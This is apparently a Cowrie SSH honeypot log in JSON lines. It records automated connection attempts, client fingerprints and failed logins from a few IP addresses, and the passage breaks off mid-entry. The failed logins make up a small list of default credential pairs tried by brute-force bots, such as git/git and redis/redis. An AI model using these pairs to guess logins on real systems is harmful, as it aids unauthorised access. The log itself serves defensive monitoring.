{"eventid":"cowrie.login.failed","username":"liberty-bridge","password":"liberty-bridge","message":"login attempt [liberty-bridge/liberty-bridge] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:47.300331Z","src_ip":"212.227.125.160","session":"c9cf1d1a3863"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:48.351097Z","src_ip":"212.227.125.160","session":"c9cf1d1a3863"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":64730,"dst_ip":"1.2.3.4","dst_port":22,"session":"02e50774e1de","protocol":"ssh","message":"New connection: 217.72.205.35:64730 (1.2.3.4:22) [session: 02e50774e1de]","sensor":"my-vps","timestamp":"2025-08-26T11:21:50.310407Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:50.311626Z","src_ip":"217.72.205.35","session":"02e50774e1de"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50626,"dst_ip":"1.2.3.4","dst_port":22,"session":"e08196a36e34","protocol":"ssh","message":"New connection: 212.227.125.160:50626 (1.2.3.4:22) [session: e08196a36e34]","sensor":"my-vps","timestamp":"2025-08-26T11:21:52.425029Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:52.426011Z","src_ip":"212.227.125.160","session":"e08196a36e34"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:52.476033Z","src_ip":"212.227.125.160","session":"e08196a36e34"}
{"eventid":"cowrie.login.failed","username":"ec2-user","password":"ec2-user","message":"login attempt [ec2-user/ec2-user] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:52.647180Z","src_ip":"212.227.125.160","session":"e08196a36e34"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:53.699960Z","src_ip":"212.227.125.160","session":"e08196a36e34"}
{"eventid":"cowrie.session.closed","duration":13.084160089492798,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:58.011332Z","src_ip":"212.227.125.160","session":"c3e59347708f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51394,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e58696debc0","protocol":"ssh","message":"New connection: 212.227.125.160:51394 (1.2.3.4:22) [session: 4e58696debc0]","sensor":"my-vps","timestamp":"2025-08-26T11:21:58.319857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:58.320512Z","src_ip":"212.227.125.160","session":"4e58696debc0"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:58.375395Z","src_ip":"212.227.125.160","session":"4e58696debc0"}
{"eventid":"cowrie.login.failed","username":"media","password":"media","message":"login attempt [media/media] failed","sensor":"my-vps","timestamp":"2025-08-26T11:21:58.533568Z","src_ip":"212.227.125.160","session":"4e58696debc0"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:58.987182Z","src_ip":"212.227.125.160","session":"7fdd73f57021"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:21:59.603549Z","src_ip":"212.227.125.160","session":"4e58696debc0"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":56890,"dst_ip":"1.2.3.4","dst_port":22,"session":"9bbae744814d","protocol":"ssh","message":"New connection: 83.168.105.65:56890 (1.2.3.4:22) [session: 9bbae744814d]","sensor":"my-vps","timestamp":"2025-08-26T11:21:59.946855Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:21:59.947868Z","src_ip":"83.168.105.65","session":"9bbae744814d"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:21:59.984956Z","src_ip":"83.168.105.65","session":"9bbae744814d"}
{"eventid":"cowrie.login.failed","username":"git","password":"git","message":"login attempt [git/git] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:00.098377Z","src_ip":"83.168.105.65","session":"9bbae744814d"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:01.138095Z","src_ip":"83.168.105.65","session":"9bbae744814d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52160,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6273f1e20bb","protocol":"ssh","message":"New connection: 212.227.125.160:52160 (1.2.3.4:22) [session: a6273f1e20bb]","sensor":"my-vps","timestamp":"2025-08-26T11:22:03.984019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:03.985549Z","src_ip":"212.227.125.160","session":"a6273f1e20bb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:04.035916Z","src_ip":"212.227.125.160","session":"a6273f1e20bb"}
{"eventid":"cowrie.login.failed","username":"smtest","password":"smtest","message":"login attempt [smtest/smtest] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:04.240134Z","src_ip":"212.227.125.160","session":"a6273f1e20bb"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:05.477994Z","src_ip":"212.227.125.160","session":"a6273f1e20bb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52928,"dst_ip":"1.2.3.4","dst_port":22,"session":"f66340026a20","protocol":"ssh","message":"New connection: 212.227.125.160:52928 (1.2.3.4:22) [session: f66340026a20]","sensor":"my-vps","timestamp":"2025-08-26T11:22:09.628834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:09.630452Z","src_ip":"212.227.125.160","session":"f66340026a20"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:09.682244Z","src_ip":"212.227.125.160","session":"f66340026a20"}
{"eventid":"cowrie.login.failed","username":"sys","password":"sys","message":"login attempt [sys/sys] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:09.839058Z","src_ip":"212.227.125.160","session":"f66340026a20"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:10.892366Z","src_ip":"212.227.125.160","session":"f66340026a20"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53696,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6640bc37db6","protocol":"ssh","message":"New connection: 212.227.125.160:53696 (1.2.3.4:22) [session: a6640bc37db6]","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.377733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.490593Z","src_ip":"212.227.125.160","session":"a6640bc37db6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.491261Z","src_ip":"212.227.125.160","session":"a6640bc37db6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":52890,"dst_ip":"1.2.3.4","dst_port":22,"session":"086436eec412","protocol":"ssh","message":"New connection: 83.168.105.65:52890 (1.2.3.4:22) [session: 086436eec412]","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.707181Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.708191Z","src_ip":"83.168.105.65","session":"086436eec412"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.745267Z","src_ip":"83.168.105.65","session":"086436eec412"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:15.878766Z","src_ip":"83.168.105.65","session":"086436eec412"}
{"eventid":"cowrie.login.failed","username":"mail","password":"mail","message":"login attempt [mail/mail] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:16.878820Z","src_ip":"212.227.125.160","session":"a6640bc37db6"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:16.916450Z","src_ip":"83.168.105.65","session":"086436eec412"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:17.934080Z","src_ip":"212.227.125.160","session":"a6640bc37db6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54466,"dst_ip":"1.2.3.4","dst_port":22,"session":"80cc59f3c670","protocol":"ssh","message":"New connection: 212.227.125.160:54466 (1.2.3.4:22) [session: 80cc59f3c670]","sensor":"my-vps","timestamp":"2025-08-26T11:22:21.013267Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:21.014077Z","src_ip":"212.227.125.160","session":"80cc59f3c670"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:21.396039Z","src_ip":"212.227.125.160","session":"80cc59f3c670"}
{"eventid":"cowrie.login.failed","username":"redis","password":"redis","message":"login attempt [redis/redis] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:21.596021Z","src_ip":"212.227.125.160","session":"80cc59f3c670"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:22.713663Z","src_ip":"212.227.125.160","session":"80cc59f3c670"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55234,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba9cbaca440f","protocol":"ssh","message":"New connection: 212.227.125.160:55234 (1.2.3.4:22) [session: ba9cbaca440f]","sensor":"my-vps","timestamp":"2025-08-26T11:22:26.858149Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:26.863838Z","src_ip":"212.227.125.160","session":"ba9cbaca440f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:22:26.910901Z","src_ip":"212.227.125.160","session":"ba9cbaca440f"}
{"eventid":"cowrie.login.failed","username":"node","password":"node","message":"login attempt [node/node] failed","sensor":"my-vps","timestamp":"2025-08-26T11:22:27.383970Z","src_ip":"212.227.125.160","session":"ba9cbaca440f"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:22:28.638085Z","src_ip":"212.227.125.160","session":"ba9cbaca440f"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36152,"dst_ip":"1.2.3.4","dst_port":22,"session":"cad1aa5787c3","protocol":"ssh","message":"New connection: 83.168.105.65:36152 (1.2.3.4:22) [session: cad1aa5787c3]","sensor":"my-vps","timestamp":"2025-08-26T11:22:31.523090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:22:31.523912Z","src_ip":"83.168.105.65","session":"cad1aa5787c3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-n